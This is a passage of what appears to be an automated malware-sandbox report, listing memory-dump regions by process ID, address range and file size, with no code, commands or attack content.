
                                                                                                          • memory/2008-70-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2008-63-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2020-244-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2068-211-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2172-306-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2172-307-0x00000000003C0000-0x00000000003DC000-memory.dmp
                                                                                                            Filesize

                                                                                                            112KB

                                                                                                          • memory/2180-207-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2208-220-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2232-151-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2232-169-0x0000000001E10000-0x0000000001F11000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/2232-170-0x0000000000280000-0x00000000002DC000-memory.dmp
                                                                                                            Filesize

                                                                                                            368KB

                                                                                                          • memory/2232-168-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/2252-152-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2272-209-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2316-298-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2320-225-0x00000000027A0000-0x000000000289F000-memory.dmp
                                                                                                            Filesize

                                                                                                            1020KB

                                                                                                          • memory/2320-202-0x0000000000420000-0x0000000000491000-memory.dmp
                                                                                                            Filesize

                                                                                                            452KB

                                                                                                          • memory/2320-201-0x00000000000F0000-0x000000000013B000-memory.dmp
                                                                                                            Filesize

                                                                                                            300KB

                                                                                                          • memory/2320-200-0x00000000FF3D246C-mapping.dmp
                                                                                                          • memory/2328-162-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2352-294-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2384-193-0x0000000004760000-0x0000000004761000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2384-176-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2384-182-0x0000000000070000-0x0000000000071000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2428-179-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2472-123-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2476-234-0x0000000000400000-0x00000000004A0000-memory.dmp
                                                                                                            Filesize

                                                                                                            640KB

                                                                                                          • memory/2476-233-0x00000000001B0000-0x00000000001B9000-memory.dmp
                                                                                                            Filesize

                                                                                                            36KB

                                                                                                          • memory/2476-224-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2512-286-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2512-287-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2512-288-0x00000000049B2000-0x00000000049B3000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2512-204-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2544-293-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2548-185-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2564-203-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2572-245-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2640-125-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2648-205-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2744-215-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2744-270-0x00000000026E0000-0x00000000026E1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2744-273-0x0000000004930000-0x0000000004931000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2744-274-0x0000000006140000-0x0000000006141000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2744-271-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2744-272-0x0000000004972000-0x0000000004973000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2744-217-0x00000000002C0000-0x00000000002D0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2744-218-0x00000000002F0000-0x0000000000302000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/2744-268-0x0000000001F20000-0x0000000001F21000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2744-266-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2744-269-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2760-315-0x0000000004B30000-0x0000000004B31000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2780-311-0x0000000004A40000-0x0000000004A41000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2780-312-0x0000000004A42000-0x0000000004A43000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2796-188-0x0000000004E50000-0x0000000004E51000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2796-166-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                            Filesize

                                                                                                            112KB

                                                                                                          • memory/2796-158-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                            Filesize

                                                                                                            112KB

                                                                                                          • memory/2796-161-0x00000000004171EE-mapping.dmp
                                                                                                          • memory/2804-143-0x0000000000E50000-0x0000000000E51000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2804-133-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2804-145-0x0000000000B10000-0x0000000000B11000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2816-194-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                            Filesize

                                                                                                            192KB

                                                                                                          • memory/2816-198-0x0000000000400000-0x0000000000430000-memory.dmp
                                                                                                            Filesize

                                                                                                            192KB

                                                                                                          • memory/2816-195-0x000000000042977E-mapping.dmp
                                                                                                          • memory/2816-212-0x0000000004940000-0x0000000004941000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2836-292-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2840-213-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2848-189-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2880-136-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2916-206-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2932-299-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2940-138-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2940-141-0x00000000001D0000-0x00000000001E0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2940-142-0x0000000000200000-0x0000000000212000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/2956-228-0x0000000000402F68-mapping.dmp
                                                                                                          • memory/2956-227-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/2976-301-0x00000000005C0000-0x00000000005C1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2976-300-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2984-281-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2984-146-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2984-282-0x00000000049B2000-0x00000000049B3000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2984-280-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3020-210-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3052-148-0x0000000000000000-mapping.dmp